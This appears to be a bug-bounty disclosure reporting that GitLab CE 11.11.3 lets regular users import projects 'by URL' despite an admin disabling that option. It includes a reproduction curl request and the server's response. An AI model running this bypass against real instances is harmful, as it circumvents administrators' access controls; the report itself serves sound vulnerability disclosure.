ESCALATED: Bypass Disabled Repo by URL Project Creation
HackerOne report #630263 by ngalog
on 2019-06-26, assigned to estrike
:
Summary
As an admin, you can disable Repo by URL project creation in admin page https://:gitlab_instance/admin/application_settings
However the user can still import project using repo by url regardless of the setting
Steps to reproduce
- As an admin, disable
Repo by URL
import source in/admin/application_settings/general
underVisibility and access controls
- As a regular user, run the following curl command:
curl 'http://gitlab.local/-/projects' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H "Cookie: $COOKIE" \
--data-raw "utf8=%E2%9C%93&authenticity_token=$VALID_AUTHENTICITY_TOKEN&project%5Bimport_url%5D=https%3A%2F%2Fgitlab.com%2Fgitlab-org%2Frelease-cli.git&project%5Bimport_url_user%5D=&project%5Bimport_url_password%5D=&project%5Bci_cd_only%5D=false&project%5Bname%5D=Importing+Even+If+Disabled&project%5Bnamespace_id%5D=7&project%5Bpath%5D=importing-even-if-disabled&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0"
This command sends a request equivalent to what happens when using the Repo by URL
import methods in the UI. It will import the gitlab-org/release-cli
project by URL. In my case I got the response
<html><body>You are being <a href="http://gitlab.local/attacker/importing-even-if-disabled">redirected</a>.</body></html>
and the project was imported anyway.
Impact
Bypass project creation despite the admin setting explcitily disallow it
What is the current bug behavior?
Bypass project creation despite the admin setting explcitily disallow it
reproduced on gitlab CE 11.11.3 (gitlab-ce@e3eeb779d72006b9fbbaecf9f1d8fbd52a7d6383)
Impact
bypass project creation by repo by url